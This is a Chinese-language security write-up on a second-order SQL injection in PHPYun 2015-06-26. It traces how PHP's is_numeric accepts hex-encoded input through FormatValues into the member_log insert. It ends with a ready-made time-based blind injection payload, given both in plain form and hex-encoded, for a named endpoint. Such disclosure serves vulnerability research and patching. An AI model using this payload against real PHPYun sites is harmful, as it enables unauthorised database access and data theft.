~# n0tr00t Security Team

危险的 is_numeric — PHPYun 2015-06-26 SQL Injection

13 Oct 2015 - fridayy

[+] Author: fridayy
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2015-10-13

Vulnerability: http://wooyun.org/bugs/wooyun-2015-0122884

0x00 知识前提

PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字。

<?php
echo is_numeric(233333);       # 1
echo is_numeric('233333');  # 1
echo is_numeric(0x233333);  # 1
echo is_numeric('0x233333');   # 1
echo is_numeric('233333abc');  # 0
?>

MySQL数据库同样支持16进制,也就是HEX编码。虽然不像is_numeric函数一样有着比较强的容错性,但还是能够完成如下操作。

> insert into test (id, value) values (1, 0x74657374);
> select * from test;
| id | value |
| 1  | test  |

以上两点单独看起来都没什么问题,但如果遇到合适的场景,比如程序猿只是用is_numeric函数验证变量是否为数字,就很有可能插入一些特殊字符到数据库中。虽然不能造成直接的SQL注入,但危险的数据已经悄悄潜伏在了路边,就等你经过。

0x10 寻找可利用的is_numeric

我们现在已经知道了is_numeric是个危险的函数,全局搜索的结果有很多,我们进一步筛选一下:

经过人肉筛选之后,我们得到了一个函数:

# /app/public/action.class.php
function FormatValues($Values){
    $ValuesStr='';
    foreach($Values as $k=>$v){
        if(is_numeric($k)){
            $ValuesStr.=','.$v;
        }else{
            if(is_numeric($v)){
                $ValuesStr.=',`'.$k.'`='.$v;
            }else{
                $ValuesStr.=',`'.$k.'`=\''.$v.'\'';
            }
        }
    }
    return substr($ValuesStr,1);
}

这是个中间函数,我们搜一下哪里用到了这个函数。

http://ww2.sinaimg.in/large/c334041bgw1ewzokj18l8j20k60hawhg.jpg

多个数据表模型都用到了这个函数,基本都是Update操作。现在的思路是利用接口将恶意代码Update进数据库,再通过其他接口,从数据库读恶意数据,在再次存到数据库的时候,进行注入。接下来的任务,是筛选能造成二次注入的点。

0x20 二次注入点

寻找二次注入的过程,是重复性的工作。根据全局搜索得出的多个模型,找到对应的控制层的代码,根据如下条件去筛选:

举个例子,ask.model.php中,出现了五次FormatValues。分别是:

搜索UpdateAttention:

http://ww2.sinaimg.in/large/c334041bgw1ewzol9mixpj20jo05omyp.jpg

跟进函数:

http://ww3.sinaimg.in/large/c334041bgw1ewzolsizjdj20i10frtcu.jpg

可以看到$type, 也就是写进attention表的type,是可用的。但是在数据库中查过之后,发现type的数据结构是int(11),太短,放弃。

再继续查,UpdateQclass,没有实际用到。继续,UpdateAnswer:

http://ww4.sinaimg.in/large/c334041bgw1ewzoocd0hoj20nj040my1.jpg

验证后,也没有可用的。用这种方法,逐个去排除,直到:

http://ww2.sinaimg.in/large/c334041bjw1ewzopu4swvj20nh09sado.jpg

跟进函数:

function saveinfo_action(){
    if($_POST['submitBtn']){
        $M=$this->MODEL('friend');
        unset($_POST['submitBtn']);
        $nid=$M->SaveFriendInfo($_POST,array("uid"=>$this->uid));
        if($nid){
            $state_content = "我刚修改了个性签名<br>[".$_POST['description']."]。";
            $this->addstate($state_content);
            $M->member_log("修改朋友圈基本信息");
            $this->ACT_layer_msg("更新成功!",9,$_SERVER['HTTP_REFERER']);
        }else{
            $this->ACT_layer_msg("更新失败!",8,$_SERVER['HTTP_REFERER']);
        }
    }
}

再看一下friend_info表(从SaveFriendInfo()可以得到表名),nickname、description的数据结构都是varchar(100)。

终于找到了恶意代码插入点,接下来看看能不能利用。从DB层(friend.model.php)可以找到GetFriendInfo():

function GetFriendInfo($Where=array(),$Options=array()){
    $WhereStr=$this->FormatWhere($Where);
    $FormatOptions=$this->FormatOptions($Options);
    $row=$this->DB_select_once('friend_info',$WhereStr,$FormatOptions['field']);
    if($row['pic']==''){
        $row['pic']=$row['pic_big']=$this->config['sy_weburl'].'/'.$this->config['sy_friend_icon'];
    }else{
        $row['pic'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic']);
        $row['pic_big'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic_big']);
    }
    return $row;
}

从数据库读出来的数据,处理了一下pic参数,就返回了。搜索一下哪里用到了这个函数:

http://ww3.sinaimg.in/large/c334041bgw1ewzorcwf9qj20km08an0a.jpg

逐个排除,定位到函数:

http://ww4.sinaimg.in/large/c334041bgw1ewzos1mwq0j20lo0d50x4.jpg

跟进member_log函数:

function member_log($content,$opera='',$type=''){
	if($_COOKIE['uid']){
		$value="`uid`='".(int)$_COOKIE['uid']."',";
		$value.="`usertype`='".(int)$_COOKIE['usertype']."',";
		$value.="`content`='".$content."',";
		$value.="`opera`='".$opera."',";
		$value.="`type`='".$type."',";
		$value.="`ip`='".fun_ip_get()."',";
		$value.="`ctime`='".time()."'";
		$this->DB_insert_once("member_log",$value);
	}
}

跟进DB_insert_once函数:

function DB_insert_once($tablename, $value){
	$SQL = "INSERT INTO `" . $this->def . $tablename . "` SET ".$value;
	$this->db->query("set sql_mode=''");
	$this->db->query($SQL);
	$nid= $this->db->insert_id();
	return $nid;
}

成功找到注入点。

0x20 利用

先尝试通过hex编码写入测试信息,如图所示 。刷新后,成功写入! http://127.0.0.1/phpyun0625/friend/index.php?c=info

http://ww1.sinaimg.in/large/c334041bgw1ewzot9kvd7j20ma08wabn.jpg

测试二次注入的接口,在DB_insert_once()打印SQL语句 http://127.0.0.1/phpyun0625/ask/index.php?c=friend&a=atnuser

POST: id=2

返回结果如下:

INSERT INTO `phpyun_atn` SET `uid`='2',`sc_uid`='1',`usertype`='1',`sc_usertype`='1',`time`='1444726415'
INSERT INTO `phpyun_friend_state` SET `uid`='2',`content`='关注了<a href=\"http://127.0.0.1/phpyun0625/ask/index.php?c=friend&uid=1\">\'\"</a>',`type`='2',`ctime`='1444726415'
INSERT INTO `phpyun_sysmsg` SET `fa_uid`='1',`content`='用户 bb2 关注了你!',`username`='bb1',`ctime`='1444726415'
INSERT INTO `phpyun_member_log` SET `uid`='2',`usertype`='1',`content`='关注了'"',`opera`='',`type`='',`ip`='127.0.0.1',`ctime`='1444726415'
1

第四条SQL语句成功注入。

构造一个基于时间的盲注:

 ',ip=(select if(mid(user(),1,1)='r',sleep(5),0))#
 	0x20272c69703d2873656c656374206966286d6964287573657228292c312c31293d2772272c736c6565702835292c30292923

成功延时注入:

http://ww2.sinaimg.in/large/c334041bgw1ewzovg3adej20qy07tjt2.jpg